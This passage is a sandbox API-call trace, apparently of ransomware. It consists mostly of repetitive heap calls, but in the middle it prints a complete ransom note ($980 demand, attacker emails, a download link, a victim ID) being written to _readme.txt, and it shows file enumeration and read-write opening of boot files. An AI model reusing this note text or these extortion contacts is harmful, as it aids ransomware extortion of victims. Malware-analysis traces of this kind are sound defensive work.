(HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.648] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0183.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.648] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.648] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.648] PathFindFileNameW (pszPath="") returned="" [0183.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.649] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.649] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.649] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.649] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.650] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0183.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.650] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0183.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.650] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.650] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.650] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.652] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*" (normalized: "c:\\boot\\fi-fi\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.653] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.653] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.653] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0183.653] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.655] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.655] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.656] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.656] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: 